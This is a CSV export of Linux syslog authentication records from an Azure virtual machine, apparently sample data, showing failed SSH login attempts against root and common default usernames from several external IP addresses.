+3331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:52,UbuntuDevEnv,2019-06-28 05:31:52,auth,UbuntuDevEnv,info,Invalid user webadmin from 193.201.224.232 port 42398,97036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,193.201.224.2,42398,,
+3332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:52,UbuntuDevEnv,2019-06-28 05:31:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,97036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:52,UbuntuDevEnv,2019-06-28 05:31:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,97036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:54,UbuntuDevEnv,2019-06-28 05:31:53,auth,UbuntuDevEnv,info,Failed password for invalid user webadmin from 193.201.224.232 port 42398 ssh2,97036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,193.201.224.2,42398,,
+3335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:54,UbuntuDevEnv,2019-06-28 05:31:53,auth,UbuntuDevEnv,info,"Disconnecting invalid user webadmin 193.201.224.232 port 42398: Change of username or service not allowed: (webadmin,ssh-connection) -> (webmaster,ssh-connection) [preauth]",97036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,193.201.224.2,42398,,
+3336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:57,UbuntuDevEnv,2019-06-28 05:31:57,auth,UbuntuDevEnv,info,Invalid user webmaster from 193.201.224.232 port 48162,97057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,193.201.224.2,48162,,
+3337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:58,UbuntuDevEnv,2019-06-28 05:31:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,97057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:31:58,UbuntuDevEnv,2019-06-28 05:31:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,97057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:00,UbuntuDevEnv,2019-06-28 05:31:59,auth,UbuntuDevEnv,info,Failed password for invalid user webmaster from 193.201.224.232 port 48162 ssh2,97057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,193.201.224.2,48162,,
+3340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:00,UbuntuDevEnv,2019-06-28 05:31:59,auth,UbuntuDevEnv,info,"Disconnecting invalid user webmaster 193.201.224.232 port 48162: Change of username or service not allowed: (webmaster,ssh-connection) -> (zabbix,ssh-connection) [preauth]",97057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,193.201.224.2,48162,,
+3341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:05,UbuntuDevEnv,2019-06-28 05:32:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,97377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:05,UbuntuDevEnv,2019-06-28 05:32:04,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 41745,97377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,41745,,
+3343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:05,UbuntuDevEnv,2019-06-28 05:32:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,97377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+3344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:06,UbuntuDevEnv,2019-06-28 05:32:06,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 41745 ssh2,97377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,41745,,
+3345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:07,UbuntuDevEnv,2019-06-28 05:32:06,auth,UbuntuDevEnv,info,Invalid user zabbix from 193.201.224.232 port 53957,97074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,193.201.224.2,53957,,
+3346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:07,UbuntuDevEnv,2019-06-28 05:32:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,97074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:07,UbuntuDevEnv,2019-06-28 05:32:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,97074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:07,UbuntuDevEnv,2019-06-28 05:32:06,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 41745: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",97377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,41745,,
+3349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:09,UbuntuDevEnv,2019-06-28 05:32:08,auth,UbuntuDevEnv,info,Failed password for invalid user zabbix from 193.201.224.232 port 53957 ssh2,97074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,193.201.224.2,53957,,
+3350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:32:09,UbuntuDevEnv,2019-06-28 05:32:09,auth,UbuntuDevEnv,info,Connection closed by invalid user zabbix 193.201.224.232 port 53957 [preauth],97074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,193.201.224.2,53957,,invalid
+3351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:43:43,UbuntuDevEnv,2019-06-28 05:43:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,99721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:43:45,UbuntuDevEnv,2019-06-28 05:43:45,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 51558 ssh2,99721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,51558,,
+3353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:44:08,UbuntuDevEnv,2019-06-28 05:44:07,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 51558 [preauth],99721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,51558,,authenticating
+3354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:09:15,UbuntuDevEnv,2019-06-28 06:09:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,105440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:09:18,UbuntuDevEnv,2019-06-28 06:09:17,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 52692 ssh2,105440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,52692,,
+3356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:10:21,UbuntuDevEnv,2019-06-28 06:10:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,105629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:10:23,UbuntuDevEnv,2019-06-28 06:10:22,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 37222 ssh2,105629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,37222,,
+3358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:10:24,UbuntuDevEnv,2019-06-28 06:10:23,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 37222 [preauth],105629,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,37222,,authenticating
+3359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:11:17,UbuntuDevEnv,2019-06-28 06:11:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,105866,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:11:19,UbuntuDevEnv,2019-06-28 06:11:19,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 55404 ssh2,105866,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,55404,,
+3361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:11:23,UbuntuDevEnv,2019-06-28 06:11:22,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 55404 [preauth],105866,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,55404,,authenticating
+3362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:13:28,UbuntuDevEnv,2019-06-28 06:13:28,auth,UbuntuDevEnv,info,Connection closed by 45.67.14.164 port 56718 [preauth],106430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.67.14.1,56718,,
+3363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:17:50,UbuntuDevEnv,2019-06-28 06:17:49,auth,UbuntuDevEnv,info,Received disconnect from 206.189.129.131 port 44904:11: Bye Bye [preauth],107461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.129.1,44904,,
+3364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:17:50,UbuntuDevEnv,2019-06-28 06:17:49,auth,UbuntuDevEnv,info,Disconnected from 206.189.129.131 port 44904 [preauth],107461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.129.1,44904,,
+3365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:26:02,UbuntuDevEnv,2019-06-28 06:26:02,auth,UbuntuDevEnv,info,Connection reset by 196.52.43.86 port 52872 [preauth],109376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.52.43.8,52872,,
+3366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:26:21,UbuntuDevEnv,2019-06-28 06:26:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,109269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:26:23,UbuntuDevEnv,2019-06-28 06:26:22,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 33428 ssh2,109269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,33428,,
+3368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:26:32,UbuntuDevEnv,2019-06-28 06:26:32,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 33428 [preauth],109269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,33428,,authenticating
+3369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:27:29,UbuntuDevEnv,2019-06-28 06:27:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,109525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:27:31,UbuntuDevEnv,2019-06-28 06:27:31,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 42796 ssh2,109525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,42796,,
+3371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:27:42,UbuntuDevEnv,2019-06-28 06:27:42,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 42796 [preauth],109525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,42796,,authenticating
+3372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:31,UbuntuDevEnv,2019-06-28 06:29:30,auth,UbuntuDevEnv,info,Invalid user pi from 113.161.65.119 port 38062,110127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,113.161.65.1,38062,,
+3373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:31,UbuntuDevEnv,2019-06-28 06:29:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=113.161.65.119,110127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,113.161.65.1,,0,
+3374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:31,UbuntuDevEnv,2019-06-28 06:29:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:31,UbuntuDevEnv,2019-06-28 06:29:31,auth,UbuntuDevEnv,info,Invalid user pi from 113.161.65.119 port 38064,110129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,113.161.65.1,38064,,
+3376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:32,UbuntuDevEnv,2019-06-28 06:29:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:32,UbuntuDevEnv,2019-06-28 06:29:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=113.161.65.119,110129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,113.161.65.1,,0,
+3378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:33,UbuntuDevEnv,2019-06-28 06:29:33,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 113.161.65.119 port 38062 ssh2,110127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,113.161.65.1,38062,,
+3379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:33,UbuntuDevEnv,2019-06-28 06:29:33,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 113.161.65.119 port 38062 [preauth],110127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,113.161.65.1,38062,,invalid
+3380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:33,UbuntuDevEnv,2019-06-28 06:29:33,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 113.161.65.119 port 38064 ssh2,110129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,113.161.65.1,38064,,
+3381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:29:34,UbuntuDevEnv,2019-06-28 06:29:33,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 113.161.65.119 port 38064 [preauth],110129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,113.161.65.1,38064,,invalid
+3382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:30:24,UbuntuDevEnv,2019-06-28 06:30:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,110223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:30:26,UbuntuDevEnv,2019-06-28 06:30:25,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 50214 ssh2,110223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,50214,,
+3384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:30:28,UbuntuDevEnv,2019-06-28 06:30:28,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 50214 [preauth],110223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,50214,,authenticating
+3385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:31:49,UbuntuDevEnv,2019-06-28 06:31:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,110379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+3386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:31:51,UbuntuDevEnv,2019-06-28 06:31:50,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 60652 ssh2,110379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,60652,,
+3387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:31:52,UbuntuDevEnv,2019-06-28 06:31:51,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 60652 [preauth],110379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,60652,,authenticating
+3388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:34:30,UbuntuDevEnv,2019-06-28 06:34:29,auth,UbuntuDevEnv,info,Connection closed by 54.153.127.240 port 57774 [preauth],111436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.153.127.2,57774,,
+3389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 06:35:00,UbuntuDevEnv,2019-06-28 06:34:59,auth,UbuntuDevEnv,info,Unable to negotiate with 54.153.127.240 port 39476: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth],111608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.153.127.2,39476,,
